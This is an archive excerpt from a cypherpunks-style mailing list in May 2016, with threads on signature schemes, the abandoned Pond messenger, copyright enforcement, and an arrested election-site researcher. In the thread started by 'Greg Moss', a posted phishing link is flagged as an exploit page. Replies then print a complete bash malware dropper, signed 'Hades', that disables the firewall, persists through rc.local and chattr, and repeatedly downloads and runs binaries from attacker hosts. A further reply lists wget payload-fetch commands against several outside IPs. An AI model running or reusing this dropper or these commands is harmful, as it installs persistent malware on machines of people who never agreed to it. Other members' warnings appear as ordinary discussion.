<1BAB8392-3AFE-4D07-9B09-52BD4CEC575E@flownet.com> References: <2CF6A1BE-9912-4FE6-98F4-202E539D9795@gmail.com> <572A7B5E.20904@iang.org> <1BAB8392-3AFE-4D07-9B09-52BD4CEC575E@flownet.com> Message-ID: On Fri, May 6, 2016 at 12:06 PM, Ron Garret wrote: > > But with all forms of DH based signatures, a random number is generated > and that affects the signature value. In effect, every signature has a salt > value. Interesting sidebar: ECDSA nonces were one of the sources of Bitcoin's transaction malleability. The (massive pile of hacks that is) segregated witness feature being added to Bitcoin has an added side effect of removing signatures from the hash of a transaction, and with it the associated malleability. All that said, if you're designing a new system today, pick Ed25519. -- Tony Arcieri -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1039 bytes Desc: not available URL: From mrnobody at mail-on.us Sun May 8 03:49:11 2016 From: mrnobody at mail-on.us (mrnobody at mail-on.us) Date: Sun, 08 May 2016 05:49:11 -0500 Subject: What happened to Pond? Message-ID: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> First of all I'd like to say hello, since it's the first time I write in this mailing list. Now to the matter at hand. Do you remember the project Pond? https://github.com/agl/pond I actually never used it, but when back in the day I read the design it seemed like a new approach to mail, encrypted and careful with metadata. Now the project sees unmaintained, and it seems Adam Langley deleted the webpage of the project (pond.imperialviolet.org) from its personal webpage (imperialviolet.org) An old post about the project for those who doesn't know it. https://www.imperialviolet.org/2013/11/10/pond.html ------------------------------------------------- ONLY AT VFEmail! - Use our Metadata Mitigator to keep your email out of the NSA's hands! $24.95 ONETIME Lifetime accounts with Privacy Features! 15GB disk! No bandwidth quotas! Commercial and Bulk Mail Options! From mrnobody at mail-on.us Sun May 8 12:52:34 2016 From: mrnobody at mail-on.us (mrnobody at mail-on.us) Date: Sun, 08 May 2016 14:52:34 -0500 Subject: What happened to Pond? Message-ID: <20160508145234.Horde.jS5JeWWUeH91XphEm_IPIw1@www.vfemail.net> First of all I'd like to say hello, since it's the first time I write in this mailing list. Now to the matter at hand. Do you remember the project Pond? https://github.com/agl/pond I actually never used it, but when back in the day I read the design it seemed like a new approach to mail, encrypted and careful with metadata. Now the project sees unmaintained, and it seems Adam Langley deleted the webpage of the project (pond.imperialviolet.org) from its personal webpage (imperialviolet.org) An old post about the project for those who doesn't know it. https://www.imperialviolet.org/2013/11/10/pond.html ------------------------------------------------- ONLY AT VFEmail! - Use our Metadata Mitigator to keep your email out of the NSA's hands! $24.95 ONETIME Lifetime accounts with Privacy Features! 15GB disk! No bandwidth quotas! Commercial and Bulk Mail Options! From gmoss82 at gmail.com Mon May 9 23:13:56 2016 From: gmoss82 at gmail.com (Greg Moss) Date: Mon, 9 May 2016 23:13:56 -0700 Subject: No subject Message-ID: <017201d1aa83$232378e0$696a6aa0$@gmail.com> http://219.234.6.206:8080/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1607 bytes Desc: not available URL: From zen at freedbms.net Mon May 9 17:37:52 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 10 May 2016 00:37:52 +0000 Subject: Conscientious ISP "process servers" - charge RIAA mafia for service on customer Message-ID: >From this slashdot article: https://yro.slashdot.org/story/16/05/08/0030230/the-pirate-bay-now-blocked-in-chrome-firefox-and-safari (which subject title is deceptive, what's new on slashdot eh) comes this little comment conversation: https://yro.slashdot.org/comments.pl?sid=9079015&cid=52068815 1) " I'd like to elaborate on your good advice: Downloading torrents isn't a crime. It's a civil matter, there is no reason you can't contact police, however the precautions that make a site immune to civil action happen to make them difficult to pursue in criminal cases as well. The argument could be made that their advertising revenues discourage them from displaying malvertisements, however the short lifecycle of a modern torrent site results in little incentive to do anything but maximize revenues before the guillotine drops. So in practice: turn off your javascript and assuming they are using l337 zero-day hacks on your browser's incognito mode... " 2) " Felderal law says you're wrong. https://www.law.cornell.edu/uscode/text/17/506 And https://www.law.cornell.edu/uscode/text/18/2319 I gotta love the "what I do is not illegal!!!" downloaders who can't be bothered to actually check the laws before giving bad, bad, rationalizations for their behavior. " 3) " They send tons of emails to us. We contact them to pay to be their process server and they hang up the phone. Piracy is when someone makes copies and sells them. So far no bottom dwelling copyright spammer has agreed to pay for us to deliver their letter. We have never received a single subpoena. They think we have to do it for free here in the land of the fee. Even if one finally did buck up and pay for us to deliver them they would still be handled as a civil suit. Feel free to shill away how wrong I am but I have real world knowledge about how cheap these bottom feeders are. " From grarpamp at gmail.com Mon May 9 22:11:49 2016 From: grarpamp at gmail.com (grarpamp) Date: Tue, 10 May 2016 01:11:49 -0400 Subject: Trump vs. 21 Million Message-ID: https://www.reddit.com/r/Bitcoin/comments/4ik3of/donald_trump_us_will_never_default_because_you/ http://www.cnn.com/2016/05/09/politics/donald-trump-national-debt-strategy/index.html From grarpamp at gmail.com Mon May 9 22:28:15 2016 From: grarpamp at gmail.com (grarpamp) Date: Tue, 10 May 2016 01:28:15 -0400 Subject: What happened to Pond? In-Reply-To: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> References: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> Message-ID: On 5/8/16, mrnobody at mail-on.us wrote: > First of all I'd like to say hello, since it's the first time I write > in this mailing list. Now to the matter at hand. > > Do you remember the project Pond? > https://github.com/agl/pond > > I actually never used it, but when back in the day I read the design > it seemed like a new approach to mail, encrypted and careful with > metadata. Now the project sees unmaintained, and it seems Adam Langley > deleted the webpage of the project (pond.imperialviolet.org) from its > personal webpage (imperialviolet.org) > > An old post about the project for those who doesn't know it. > https://www.imperialviolet.org/2013/11/10/pond.html Asked of AGL two months ago, and again now... https://pond.imperialviolet.org/ Doesn't resolve in DNS thus appears down. Should that be interpreted to mean anything? Has it moved? Can the content be committed to the github repo? Thanks. Should probably backup and distribute the repo, tickets, papers, and website content (those having a copy) somewhere. From grarpamp at gmail.com Tue May 10 00:32:06 2016 From: grarpamp at gmail.com (grarpamp) Date: Tue, 10 May 2016 03:32:06 -0400 Subject: Conscientious ISP "process servers" - charge RIAA mafia for service on customer In-Reply-To: References: Message-ID: On 5/9/16, Zenaan Harkness wrote: > From this slashdot article: > https://yro.slashdot.org/story/16/05/08/0030230/the-pirate-bay-now-blocked-in-chrome-firefox-and-safari Potsmoking homos are having more legalization success than filesharers, even in the US. Torrenters should have set up millions strong communities in anonymous overlay networks long ago, where they could live essentially risk free and at peace, resting / planning / arming for their next battle, and winning souls en masse to crypto by forcing users to adopt to access stuff they want. At least until the Great Global Crypto Showdown (GGCS). Which everyone then stands a better chance of winning due to said new masses associating crypto and fun together as a necessity. Copyright, drugs, money, sex, speech, privacy, etc... all individual fights, now, with crypto, perhaps united, and having more venues for even "in your face" protest than just traditional realworld pridefests. > I gotta love the "what I do is not illegal!!!" downloaders who can't *reproduction* and *up* loading are often illegal, *down* loading is often legal. Thus they could well be correct under their particular technical use case, jurisdiction, etc. From grarpamp at gmail.com Tue May 10 01:26:37 2016 From: grarpamp at gmail.com (grarpamp) Date: Tue, 10 May 2016 04:26:37 -0400 Subject: [tor-talk] Music para Anarchists In-Reply-To: <1462797861.31600.3.camel@yandex.com> References: <1255000296.13752.1461537367744@office.mailbox.org> <1462797861.31600.3.camel@yandex.com> Message-ID: On 5/9/16, Thomas Iwan Bösewitsch wrote: > On Mon, 2016-04-25 at 00:36 +0200, Far Enuf wrote: >> Ça va!, >> >> Sole just released his new project Nihillismo [1], a critique of the >> société esclavagiste we all live in. >> >> Please support his work if you dig it; he supports us. >> >> If you choose only one track to listen to, Capitalism [2] es una >> wunderbar choice. >> >> -- >> >> Farenuf >> >> [1]: https://sole.bandcamp.com/album/sole-dj-pain-1-nihilismo >> >> [2]: https://sole.bandcamp.com/track/capitalism-is-tearing-us-apart-w >> -decomposure > > > Does not work without me allowing a host of untrusted sites to execute > scripts in my browser - and you (or your "anti-capitalist" bandcamp > buddies) want $25 for a two-track release? Really? > Nice try - but most likely in the wrong place. https://www.youtube.com/results?sp=EgIQAw%253D%253D&q=anarchist+music Not purely subject, yet related... https://www.youtube.com/watch?v=fzzfxmKBz2g https://www.youtube.com/watch?v=uHb6ppxoFcE https://www.youtube.com/results?sp=EgIQAw%253D%253D&q=bitcoin+music From jya at pipeline.com Tue May 10 03:52:57 2016 From: jya at pipeline.com (John Young) Date: Tue, 10 May 2016 06:52:57 -0400 Subject: In-Reply-To: <017201d1aa83$232378e0$696a6aa0$@gmail.com> References: <017201d1aa83$232378e0$696a6aa0$@gmail.com> Message-ID: At 02:13 AM 5/10/2016, Greg Moss imposter phished: >http://219.234.6.206:8080/ Which produces: Web attack: Microsoft OleAut32 RCE CVE-2014-6332 From gmoss82 at gmail.com Tue May 10 07:20:45 2016 From: gmoss82 at gmail.com (Greg Moss) Date: Tue, 10 May 2016 07:20:45 -0700 Subject: In-Reply-To: References: <017201d1aa83$232378e0$696a6aa0$@gmail.com> Message-ID: Most interested in the Journal file. Could someone have a look? On May 10, 2016 3:53 AM, "John Young" wrote: > At 02:13 AM 5/10/2016, Greg Moss imposter phished: > >> http://219.234.6.206:8080/ >> > > Which produces: > > Web attack: Microsoft OleAut32 RCE CVE-2014-6332 > > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 743 bytes Desc: not available URL: From gmoss82 at gmail.com Tue May 10 08:04:50 2016 From: gmoss82 at gmail.com (Greg Moss) Date: Tue, 10 May 2016 08:04:50 -0700 Subject: In-Reply-To: References: <017201d1aa83$232378e0$696a6aa0$@gmail.com> Message-ID: <004c01d1aacd$4db5c230$e9214690$@gmail.com> You got it - #!/bin/bash #Welcome like-minded friends to come to exchange. #We are a group of people who have a dream. # by:Hades # 2016-03-10 service iptables stop > /dev/null 2>&1 & host_dir=`pwd` if [ "sh $host_dir/journal &" = "$(cat /etc/rc.local | grep $host_dir/journal | grep -v grep)" ]; then echo "" else echo "sh $host_dir/journal &" >> /etc/rc.local fi chattr +i $host_dir/journal while [ 1 ]; do Centos_sshd_killn=$(ps aux | grep "$host_dir/hades" | grep -v grep | wc -l) if [[ $Centos_sshd_killn -eq 0 ]]; then if [ ! -f "$host_dir/hades" ]; then if [ -f "/usr/bin/wget" ]; then cp /usr/bin/wget . chmod +x wget ./wget http://hadess.f3322.net:9020/hades -c -O ./hades &> /dev/null chmod 755 ./hades rm wget -rf else echo "No wget" fi fi ./hades & elif [[ $Centos_sshd_killn -gt 1 ]]; then for killed in $(ps aux | grep "$host_dir/hades" | grep -v grep | awk '{print $2}'); do Centos_sshd_killn=$(($Centos_sshd_killn-1)) if [[ $Centos_sshd_killn -eq 1 ]]; then continue else kill -9 $killed fi done else echo "" fi Centos_ssh_killn=$(ps aux | grep "$host_dir/journal" | grep -v grep | wc -l) if [[ $Centos_ssh_killn -eq 0 ]]; then if [ ! -f "$host_dir/journal" ]; then if [ -f "/usr/bin/wget" ]; then cp /usr/bin/wget . chmod +x wget ./wget http://hadess.f3322.net:9020/journal -c -O $host_dir/journal &> /dev/null chmod 755 $host_dir/journal rm wget -rf else echo "No wget" fi fi $host_dir/journal & elif [[ $Centos_ssh_killn -gt 1 ]]; then for killed in $(ps aux | grep "$host_dir/journal" | grep -v grep | awk '{print $2}'); do Centos_ssh_killn=$(($Centos_ssh_killn-1)) if [[ $Centos_ssh_killn -eq 1 ]]; then continue else kill -9 $killed fi done else echo "" fi sleep 600 done -----Original Message----- From: John Young [mailto:jya at pipeline.com] Sent: Tuesday, May 10, 2016 7:58 AM To: cypherpunks at cpunks.org; Greg Moss Subject: Re: Great, "Greg." Log on to the IP address, click on journal. Prepare to buy new hard disk, hopelessly try to clean out back-ups, avoid for life the suckers you infected. Then try to get out of jail from the phishing gangsters who entrapped you by getting into your TEMPEST-hardened computer setup and threatening to send to your relatives and customers their implanted vile kiddie porn collection as if yours and report to the FBI "Greg's" vast cache of stolen celebrity accounts and hundreds of nyms, Tor logs, USG break-ins, counterfeit Bitcoins, comsec dirty work, rattings to LE, and, listen, hear what's buzzing over your bunker. battering your steel gate. At 10:20 AM 5/10/2016, you wrote: >Most interested in the Journal file. Could someone have a look? >On May 10, 2016 3:53 AM, "John Young" ><jya at pipeline.com> wrote: >At 02:13 AM 5/10/2016, Greg Moss imposter phished: >http://219.234.6.206:8080/ > > >Which produces: > >Web attack: Microsoft OleAut32 RCE CVE-2014-6332 > > From list at olabini.se Tue May 10 06:27:03 2016 From: list at olabini.se (Ola Bini) Date: Tue, 10 May 2016 08:27:03 -0500 Subject: What happened to Pond? In-Reply-To: References: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> Message-ID: <20160510132703.GV18163@hidden> > Can the content be committed to the github repo? Did you even look in the repo? https://github.com/agl/pond/tree/master/doc Cheers -- Ola Bini (https://olabini.se) "Yields falsehood when quined" yields falsehood when quined. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: not available URL: From mirimir at riseup.net Tue May 10 07:45:33 2016 From: mirimir at riseup.net (Mirimir) Date: Tue, 10 May 2016 08:45:33 -0600 Subject: What happened to Pond? In-Reply-To: <20160510132703.GV18163@hidden> References: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> <20160510132703.GV18163@hidden> Message-ID: <5731F40D.6000107@riseup.net> On 05/10/2016 07:27 AM, Ola Bini wrote: >> Can the content be committed to the github repo? > > Did you even look in the repo? > > https://github.com/agl/pond/tree/master/doc > > Cheers Well, is all of the former web content in the repo? From jya at pipeline.com Tue May 10 07:57:54 2016 From: jya at pipeline.com (John Young) Date: Tue, 10 May 2016 10:57:54 -0400 Subject: In-Reply-To: References: <017201d1aa83$232378e0$696a6aa0$@gmail.com> Message-ID: Great, "Greg." Log on to the IP address, click on journal. Prepare to buy new hard disk, hopelessly try to clean out back-ups, avoid for life the suckers you infected. Then try to get out of jail from the phishing gangsters who entrapped you by getting into your TEMPEST-hardened computer setup and threatening to send to your relatives and customers their implanted vile kiddie porn collection as if yours and report to the FBI "Greg's" vast cache of stolen celebrity accounts and hundreds of nyms, Tor logs, USG break-ins, counterfeit Bitcoins, comsec dirty work, rattings to LE, and, listen, hear what's buzzing over your bunker. battering your steel gate. At 10:20 AM 5/10/2016, you wrote: >Most interested in the Journal file. Could someone have a look? >On May 10, 2016 3:53 AM, "John Young" ><jya at pipeline.com> wrote: >At 02:13 AM 5/10/2016, Greg Moss imposter phished: >http://219.234.6.206:8080/ > > >Which produces: > >Web attack: Microsoft OleAut32 RCE CVE-2014-6332 > > From gmoss82 at gmail.com Tue May 10 11:11:03 2016 From: gmoss82 at gmail.com (Greg Moss) Date: Tue, 10 May 2016 11:11:03 -0700 Subject: In-Reply-To: References: <017201d1aa83$232378e0$696a6aa0$@gmail.com> Message-ID: <001701d1aae7$50f5d330$f2e17990$@gmail.com> 0 1 wget http://125.88.183.7:10258/san.txt http://125.88.183.7:10258/san.txt wget http://125.88.183.7:10258/tplin http://125.88.183.7:10258/tplin wget http://219.234.6.206:8080/journal -c &> /dev/null http://219.234.6.206:8080/journal -c &> /dev/null wget http://219.234.6.206:8080/hades -c &> /dev/null http://219.234.6.206:8080/hades -c &> /dev/null wget http://219.234.6.206:8080/journal -c &> /dev/null http://219.234.6.206:8080/journal -c &> /dev/null wget http://219.234.6.206:8080/hades -c &> /dev/null http://219.234.6.206:8080/hades -c &> /dev/null wget http://219.234.6.206:8080/journal -c &> /dev/null http://219.234.6.206:8080/journal -c &> /dev/null wget http://219.234.6.206:8080/hades -c &> /dev/null http://219.234.6.206:8080/hades -c &> /dev/null wget -O /tmp/udp http://117.21.173.4:5896/udp -O /tmp/udp http://117.21.173.4:5896/udp chmod 0755 /usr/bin/wget chmod 0755 /usr/bin/wget chattr -i /usr/bin/wget chattr -i /usr/bin/wget wget http://123.206.21.11:9925/tfip http://123.206.21.11:9925/tfip wget http://123.206.21.11:9925/v9 http://123.206.21.11:9925/v9 wget http://123.206.21.11:9925/tfip http://123.206.21.11:9925/tfip wget http://123.206.21.11:9925/v9 http://123.206.21.11:9925/v9 wget http://123.206.21.11:9925/tfip http://123.206.21.11:9925/tfip wget http://123.206.21.11:9925/v9 http://123.206.21.11:9925/v9 wget http://123.206.21.11:9925/tfip http://123.206.21.11:9925/tfip wget http://123.206.21.11:9925/v9 http://123.206.21.11:9925/v9 wget http://123.206.21.11:9925/tfip http://123.206.21.11:9925/tfip wget http://123.206.21.11:9925/v9 http://123.206.21.11:9925/v9 wget http://123.206.21.11:9925/tfip http://123.206.21.11:9925/tfip wget http://123.206.21.11:9925/v9 http://123.206.21.11:9925/v9 wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://222.186.25.51:22/sha.33 http://222.186.25.51:22/sha.33 wget http://222.186.25.51:22/yumen.32 http://222.186.25.51:22/yumen.32 wget http://222.186.25.51:22/sha.33 http://222.186.25.51:22/sha.33 wget http://222.186.25.51:22/yumen.32 http://222.186.25.51:22/yumen.32 wget http://222.186.25.51:22/yumen.32 http://222.186.25.51:22/yumen.32 wget http://222.186.25.51:22/yumen.32 http://222.186.25.51:22/yumen.32 wget http://222.186.25.51:22/yumen.32 http://222.186.25.51:22/yumen.32 wget http://222.186.25.51:22/yumen.32 http://222.186.25.51:22/yumen.32 wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget http://123.206.21.11:9925/ip http://123.206.21.11:9925/ip wget -O /etc/TV9 http://117.21.173.4:5896/TV9 -O /etc/TV9 http://117.21.173.4:5896/TV9 chmod 0755 /usr/bin/wget chmod 0755 /usr/bin/wget chattr -i /usr/bin/wget chattr -i /usr/bin/wget wget http://222.186.25.51:22/shangdu http://222.186.25.51:22/shangdu wget http://222.186.25.51:22/shangdu http://222.186.25.51:22/shangdu wget http://222.186.25.51:22/shangdu http://222.186.25.51:22/shangdu -----Original Message----- From: John Young [mailto:jya at pipeline.com] Sent: Tuesday, May 10, 2016 7:58 AM To: cypherpunks at cpunks.org; Greg Moss Subject: Re: Great, "Greg." Log on to the IP address, click on journal. Prepare to buy new hard disk, hopelessly try to clean out back-ups, avoid for life the suckers you infected. Then try to get out of jail from the phishing gangsters who entrapped you by getting into your TEMPEST-hardened computer setup and threatening to send to your relatives and customers their implanted vile kiddie porn collection as if yours and report to the FBI "Greg's" vast cache of stolen celebrity accounts and hundreds of nyms, Tor logs, USG break-ins, counterfeit Bitcoins, comsec dirty work, rattings to LE, and, listen, hear what's buzzing over your bunker. battering your steel gate. At 10:20 AM 5/10/2016, you wrote: >Most interested in the Journal file. Could someone have a look? >On May 10, 2016 3:53 AM, "John Young" ><jya at pipeline.com> wrote: >At 02:13 AM 5/10/2016, Greg Moss imposter phished: >http://219.234.6.206:8080/ > > >Which produces: > >Web attack: Microsoft OleAut32 RCE CVE-2014-6332 > > From drwho at virtadpt.net Tue May 10 11:14:00 2016 From: drwho at virtadpt.net (The Doctor) Date: Tue, 10 May 2016 11:14:00 -0700 Subject: In-Reply-To: <017201d1aa83$232378e0$696a6aa0$@gmail.com> References: <017201d1aa83$232378e0$696a6aa0$@gmail.com> Message-ID: <20160510111400.5a213f1561ba094664b06c3b@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Mon, 9 May 2016 23:13:56 -0700 "Greg Moss" wrote: > http://219.234.6.206:8080/ This isn't sketchy or anything... Site: https://www.virustotal.com/en/url/ec7eecfd04d158c3314b61e220f3bfb5afaed43be004e83144e25154abf40a52/analysis/ File: hades https://www.virustotal.com/en/file/c941b4d1543b3a527d583bfaf564e60593e1bc477676d5bce1027921296ff261/analysis/ File: hadess https://www.virustotal.com/en/file/06d0b362a8334721db74f61332c1dce9a7f2a9c60f24a92a4257111b97d27250/analysis/ Forwarned is unflatlined. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Torpedoes? What torp- Connection closed by host. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXMiToAAoJED1np1pUQ8Rk8vsP/jtswjQAmjbIutHol/yrmTp3 xVSykaKTuVyaCSaoJ+gZXkU4p+gaWUguEAqI4R1CuqvT494Mx5VQXRiI3UpqayXY cz280pf78J2ER5W4+HNFgfvOBKcx7oxdfHD4ssiKyLLFLCr6igF7S4xW0fu/aTRw r+V3937+trWzPPqSCmK+3Bxw4KLAtAKht54aYmWyLkjdyc1d3zQUfMctQCh50G+m wArQfMg9MnCymJsZkgGiI2b/kM7NY4t+cr7UyEUd4kaKlNtay/uSNpmvFcAx3NcY 4Y9pwV52l3y4fYDFKPXqcuZ4iTjf4bOyzJXlZtla2wBerDRmXxt9fLPVIy45sNu5 1sRINqLdJ79KrwY7kQNbqMMpkpzXzkndILedx7tdzMcPyrumHbwCfXXStrzkHTUn NkiRCZ+tkpiIxVVIvmBAzOEThm/AyIuO79DdNPFGMg9Vyw/QZEdqd72yQu3Lrx5n tHUdUUB0Y+6dGpAjMZrb1stcCdRwS/cBBMhPt2213/6QfRf35vO/PtmaR3vv4n0J k0046qbgnZKQVgPG9Ohozk7EAi56avgMNWmtP+QyXRc2WoWdZxsCwi80yL2ohauI c1RLcMr7EpB0dhHshqfOVe3YAyE0e3lbSoEGpcdbpl1VflndlL99kSASpkceley3 iQhYigj0WVXqbxuT54nc =jZpd -----END PGP SIGNATURE----- From mrnobody at mail-on.us Tue May 10 14:53:04 2016 From: mrnobody at mail-on.us (mrnobody at mail-on.us) Date: Tue, 10 May 2016 16:53:04 -0500 Subject: What happened to Pond? In-Reply-To: <5731F40D.6000107@riseup.net> References: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> <20160510132703.GV18163@hidden> <5731F40D.6000107@riseup.net> Message-ID: <20160510165304.Horde.IyUKGb6zK06qfLX58JwgBg1@www.vfemail.net> I checked the repo, I saw there hasn't been a commit for a year or so. I wanted to know your personal opinion on the project. I'd personally have a look at the code but I know nothing of go.

Quoting Mirimir <mirimir at riseup.net>:

On 05/10/2016 07:27 AM, Ola Bini wrote:
Can the content be committed to the github repo?
Did you even look in the repo?

https://github.com/agl/pond/tree/master/doc

Cheers
Well, is all of the former web content in the repo?


------------------------------------------------- ONLY AT VFEmail! - Use our Metadata Mitigator to keep your email out of the NSA's hands! $24.95 ONETIME Lifetime accounts with Privacy Features! 15GB disk! No bandwidth quotas! Commercial and Bulk Mail Options! From zen at freedbms.net Tue May 10 16:16:58 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Tue, 10 May 2016 23:16:58 +0000 Subject: Florida -is- part of USA right? - Lee County jailed an election fraud whistleblower Message-ID: https://it.slashdot.org/story/16/05/09/1811210/security-expert-jailed-for-reporting-vulnerabilities-in-lee-county-fl-elections Information Security Professional David Levin was arrested 3 months after reporting un-patched SQL injection vulnerabilities ( http://www.theregister.co.uk/2016/05/09/researcher_arrested_after_reporting_pwnage_hole_in_elections_site/ ) in the Lee County, Florida Elections Office run by Sharon Harrington, the Lee County Supervisor of Elections. Harrington's office has been in the news before for voting systems problems (for example in during the 2012 election, 35 districts in Lee County had to remain open 3 hours past the closing of polls due to long lines and equipment issues ( http://fcir.org/2013/12/11/center-for-american-progress-action-fund-election-report/ ), wasting $800,000 to $1.6 million of taxpayer money on incompatible iPads for which her office is facing an audit ( http://editions.lib.umn.edu/electionacademy/2015/06/18/floridas-lee-county-to-audit-e/ ). Rather than fixing the issues in their systems, they chose to charge the whistleblower with three third-degree felonies. The News Press also has several related interviews ( http://www.news-press.com/story/news/crime/2016/05/04/estero-man-arrested-hacking-into-state-lee-elections-website-david-levin-dan-sinclair/83921672/?from=global&sessionKey=&autologin= ). --- Seems corruption and mal intent is systemic in America. From rayzer at riseup.net Wed May 11 07:36:35 2016 From: rayzer at riseup.net (Rayzer) Date: Wed, 11 May 2016 07:36:35 -0700 Subject: Florida -is- part of USA right? - Lee County jailed an election fraud whistleblower In-Reply-To: References: Message-ID: <57334373.30000@riseup.net> Florida is a limp bloated, not engorged, dick ... hanging precariously on the edge of the continent. Is that what you mean? rr On 05/10/2016 04:16 PM, Zenaan Harkness wrote: > https://it.slashdot.org/story/16/05/09/1811210/security-expert-jailed-for-reporting-vulnerabilities-in-lee-county-fl-elections > Information Security Professional David Levin was arrested 3 months > after reporting un-patched SQL injection vulnerabilities ( > http://www.theregister.co.uk/2016/05/09/researcher_arrested_after_reporting_pwnage_hole_in_elections_site/ > ) in the Lee County, Florida Elections Office run by Sharon > Harrington, the Lee County Supervisor of Elections. Harrington's > office has been in the news before for voting systems problems (for > example in during the 2012 election, 35 districts in Lee County had to > remain open 3 hours past the closing of polls due to long lines and > equipment issues ( > http://fcir.org/2013/12/11/center-for-american-progress-action-fund-election-report/ > ), wasting $800,000 to $1.6 million of taxpayer money on incompatible > iPads for which her office is facing an audit ( > http://editions.lib.umn.edu/electionacademy/2015/06/18/floridas-lee-county-to-audit-e/ > ). Rather than fixing the issues in their systems, they chose to > charge the whistleblower with three third-degree felonies. The News > Press also has several related interviews ( > http://www.news-press.com/story/news/crime/2016/05/04/estero-man-arrested-hacking-into-state-lee-elections-website-david-levin-dan-sinclair/83921672/?from=global&sessionKey=&autologin= > ). > > --- > Seems corruption and mal intent is systemic in America. > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rayzer at riseup.net Wed May 11 11:25:31 2016 From: rayzer at riseup.net (Rayzer) Date: Wed, 11 May 2016 11:25:31 -0700 Subject: [tor-talk] Music para Anarchists In-Reply-To: References: <1255000296.13752.1461537367744@office.mailbox.org> <1462797861.31600.3.camel@yandex.com> Message-ID: <5733791B.9030607@riseup.net> Capitalismo... > es una underbar choice. It leaves you "Mindfucked" (Synthmesk musical Media-mindfuck un-fucking video) https://www.youtube.com/watch?v=zYTRIGtyZ44 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From admin at pilobilus.net Wed May 11 08:40:18 2016 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 11 May 2016 11:40:18 -0400 Subject: Florida -is- part of USA right? - Lee County jailed an election fraud whistleblower In-Reply-To: <57334373.30000@riseup.net> References: <57334373.30000@riseup.net> Message-ID: <57335262.1040702@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/11/2016 10:36 AM, Rayzer wrote: > Florida is a limp bloated, not engorged, dick ... hanging > precariously on the edge of the continent. Is that what you mean? Do you mean that sandbar that got taken over from the KKK by the CIA, CAP and MAF during the Kennedy Administration? The dumping ground for all the human flotsam and jetsam of the entire U.S. Northeast and Midwest? The one that whole mountains are torn down for coal to power its air conditioners? Leading importer of Federal benefit checks, leading exporter of black market prescription narcotics? Amerka's Corporate Welfare Wonderland of Free Stuff, anti-regulation and Union Busting? Home base and test market for emergent mass surveillance, predictive criminology, and multi-jurisdiction police Bureaus of Investigation? Ain't never been there, Chamber of Commerce tells me it's nice. :o/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQEcBAEBAgAGBQJXM1JiAAoJEECU6c5Xzmuqe20H/0xQRaaP4aS4+Cpn+b4cexh3 HtzjebMptl7AIxnE1H/q2YNCwOHRlgs0l5/7GS23mD1YPpFgkRpc2wr9K78H66px e34bYMv27BhYmc5qfL2DB2c9bvyVpXNbUsUOpue1Y20a2H3Gz5NFYrsy8HVD6fz+ 2IpW6OkDmVIIRqitzkH9JqHuHi8XHjPbvK3Sj2c4g3CuByobttWh7X1o4zSoDfXl w73XxYOE0p2tib9r1ZG8RkCo3dRTHtgBIYa/Ema/Wv25fXfdPrhXgSJ1rvIkLngf 3CunZdk1Z7sqoC5IjLP0LroiyApppmK17MSqhQTFWG5GnzlwLc9kGuNmUstWboc= =Siby -----END PGP SIGNATURE----- From mirimir at riseup.net Wed May 11 11:57:31 2016 From: mirimir at riseup.net (Mirimir) Date: Wed, 11 May 2016 12:57:31 -0600 Subject: What happened to Pond? In-Reply-To: <20160510165304.Horde.IyUKGb6zK06qfLX58JwgBg1@www.vfemail.net> References: <20160508054911.Horde.41eGISY6pBupXDo6THbl0g1@www.vfemail.net> <20160510132703.GV18163@hidden> <5731F40D.6000107@riseup.net> <20160510165304.Horde.IyUKGb6zK06qfLX58JwgBg1@www.vfemail.net> Message-ID: <5733809B.6060303@riseup.net> On 05/10/2016 03:53 PM, mrnobody at mail-on.us wrote: > I checked the repo, I saw there hasn't been a commit for a year or so. I > wanted to know your personal opinion on the project. I'd personally have > a look at the code but I know nothing of go. >

Quoting Mirimir < href="mailto:mirimir at riseup.net">mirimir at riseup.net>:

type="cite" style="border-left:2px solid > blue;margin-left:2px;padding-left:12px;">On 05/10/2016 07:27 AM, Ola > Bini wrote:
style="border-left:2px solid > blue;margin-left:2px;padding-left:12px;">Can the content be committed to > the github repo?
Did you even look in the repo?
>
> target="_blank">https://github.com/agl/pond/tree/master/doc
>
> Cheers
Well, is all of the former web content in the > repo?


